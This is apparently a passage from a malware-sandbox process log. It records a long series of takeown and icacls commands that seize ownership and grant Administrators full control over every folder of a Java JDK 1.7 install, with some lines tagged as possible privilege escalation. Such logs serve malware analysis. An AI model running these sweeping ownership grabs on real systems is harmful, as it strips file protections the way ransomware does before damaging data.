C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043" /grant Administrators:F2⤵PID:1212
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF" /a2⤵PID:1648
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF" /grant Administrators:F2⤵PID:2888
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116" /a2⤵PID:2456
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116" /grant Administrators:F2⤵PID:2536
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF" /a2⤵PID:2696
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF" /grant Administrators:F2⤵PID:2068
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116" /a2⤵PID:780
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116" /grant Administrators:F2⤵PID:2800
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF" /a2⤵
- Modifies file permissions
PID:2812
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF" /grant Administrators:F2⤵PID:1956
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301" /a2⤵PID:2600
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301" /grant Administrators:F2⤵PID:2388
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF" /a2⤵PID:1232
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF" /grant Administrators:F2⤵PID:1348
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301" /a2⤵PID:1676
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301" /grant Administrators:F2⤵PID:1852
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF" /a2⤵PID:1724
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF" /grant Administrators:F2⤵PID:2492
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2" /a2⤵PID:1568
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2" /grant Administrators:F2⤵PID:232
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core" /a2⤵PID:1520
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core" /grant Administrators:F2⤵PID:1108
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache" /a2⤵PID:2412
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache" /grant Administrators:F2⤵PID:2192
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary" /a2⤵PID:1876
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary" /grant Administrators:F2⤵PID:944
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine" /a2⤵PID:1152
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine" /grant Administrators:F2⤵PID:1632
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings" /a2⤵PID:2956
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings" /grant Administrators:F2⤵PID:1456
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry" /a2⤵PID:2656
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry" /grant Administrators:F2⤵PID:2540
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile" /a2⤵PID:2568
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile" /grant Administrators:F2⤵PID:1684
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\.data" /a2⤵PID:2180
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\.data" /grant Administrators:F2⤵PID:2912
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins" /a2⤵PID:2784
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins" /grant Administrators:F2⤵PID:1412
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303" /a2⤵
- Possible privilege escalation attempt
PID:896
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303" /grant Administrators:F2⤵PID:2184
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html" /a2⤵PID:2264
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html" /grant Administrators:F2⤵PID:332
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon" /a2⤵PID:1204
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon" /grant Administrators:F2⤵PID:2868
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css" /a2⤵PID:2888
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css" /grant Administrators:F2⤵PID:1356
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs" /a2⤵PID:2452
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs" /grant Administrators:F2⤵PID:484
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html" /a2⤵PID:1028
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html" /grant Administrators:F2⤵PID:2724
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons" /a2⤵PID:208
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons" /grant Administrators:F2⤵PID:908
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF" /a2⤵PID:2672
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF" /grant Administrators:F2⤵PID:1168
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303" /a2⤵PID:1016
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303" /grant Administrators:F2⤵PID:2124
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons" /a2⤵PID:1232
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons" /grant Administrators:F2⤵PID:1740
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib" /a2⤵PID:1688
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib" /grant Administrators:F2⤵PID:1908
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF" /a2⤵PID:2736
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF" /grant Administrators:F2⤵PID:2652
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema" /a2⤵
- Possible privilege escalation attempt
PID:2088
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema" /grant Administrators:F2⤵PID:1540
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033" /a2⤵PID:2832
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033" /grant Administrators:F2⤵PID:2120
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF" /a2⤵PID:928
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF" /grant Administrators:F2⤵PID:2596
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717" /a2⤵PID:1876
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717" /grant Administrators:F2⤵PID:884
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css" /a2⤵PID:2364
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css" /grant Administrators:F2⤵PID:352
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark" /a2⤵PID:1592
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark" /grant Administrators:F2⤵PID:572
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images" /a2⤵PID:2328
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images" /grant Administrators:F2⤵PID:1704
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF" /a2⤵PID:2028
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF" /grant Administrators:F2⤵PID:2744
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm" /a2⤵PID:2548
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm" /grant Administrators:F2⤵PID:1516
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc" /a2⤵PID:2784
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc" /grant Administrators:F2⤵PID:2752
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform" /a2⤵PID:2036
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform" /grant Administrators:F2⤵PID:2436
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config" /a2⤵PID:200
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config" /grant Administrators:F2⤵PID:1912
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps" /a2⤵PID:696
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps" /grant Administrators:F2⤵PID:1616
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules" /a2⤵PID:2932
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules" /grant Administrators:F2⤵PID:2480
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core" /a2⤵PID:1300
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core" /grant Administrators:F2⤵
- Modifies file permissions
PID:2600
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale" /a2⤵PID:2724
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale" /grant Administrators:F2⤵PID:2348
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib" /a2⤵PID:228
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib" /grant Administrators:F2⤵PID:1636
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe" /a2⤵PID:788
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe" /grant Administrators:F2⤵PID:2024
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale" /a2⤵PID:2276
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale" /grant Administrators:F2⤵PID:1016
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules" /a2⤵PID:2116
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules" /grant Administrators:F2⤵PID:2844
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext" /a2⤵PID:900
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext" /grant Administrators:F2⤵PID:1540
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale" /a2⤵PID:1720
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale" /grant Administrators:F2⤵PID:2076
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale" /a2⤵PID:752
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale" /grant Administrators:F2⤵PID:756
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking" /a2⤵PID:1980
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking" /grant Administrators:F2⤵PID:1456
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler" /a2⤵PID:1424
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler" /grant Administrators:F2⤵PID:928
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config" /a2⤵PID:2816
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config" /grant Administrators:F2⤵PID:2708
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules" /a2⤵PID:2528
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules" /grant Administrators:F2⤵PID:2328
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib" /a2⤵PID:536
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib" /grant Administrators:F2⤵PID:1624
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed" /a2⤵PID:1288
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed" /grant Administrators:F2⤵PID:972
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15" /a2⤵PID:1400
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15" /grant Administrators:F2⤵PID:2264
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\windows-amd64" /a2⤵
- Modifies file permissions
PID:204
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk15\windows-amd64" /grant Administrators:F2⤵PID:2784
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16" /a2⤵
- Modifies file permissions
PID:2336
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16" /grant Administrators:F2⤵PID:2400
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16\windows-amd64" /a2⤵PID:2068
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16\windows-amd64" /grant Administrators:F2⤵PID:696
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale" /a2⤵PID:2056
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale" /grant Administrators:F2⤵
- Possible privilege escalation attempt
PID:2132
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules" /a2⤵PID:296
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules" /grant Administrators:F2⤵PID:908
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale" /a2⤵PID:1260
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale" /grant Administrators:F2⤵PID:2388
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking" /a2⤵PID:1888
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking" /grant Administrators:F2⤵PID:1300
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm" /a2⤵PID:1388
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm" /grant Administrators:F2⤵PID:2980
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config" /a2⤵PID:2376
-
-
